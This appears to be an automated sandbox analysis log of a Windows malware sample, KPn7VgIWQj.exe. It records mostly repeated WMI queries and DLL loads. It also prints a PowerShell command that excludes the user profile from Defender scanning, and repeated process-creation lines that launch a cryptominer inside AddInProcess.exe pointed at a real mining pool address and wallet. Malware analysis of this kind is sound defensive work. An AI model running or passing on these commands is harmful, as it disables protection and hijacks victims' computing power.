Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: KPn7VgIWQj.exe ReversingLabs: Detection: 21%
Source: AddInProcess.exe String found in binary or memory: id-cmc-addExtensions
Source: AddInProcess.exe String found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe File read: C:\Users\user\Desktop\KPn7VgIWQj.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\KPn7VgIWQj.exe "C:\Users\user\Desktop\KPn7VgIWQj.exe"
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
Source: unknown Process created: C:\Users\user\KPn7VgIWQj.exe "C:\Users\user\KPn7VgIWQj.exe"
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: icu.dll Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: w32time.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vmictimeprovider.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: version.dll Jump to behavior
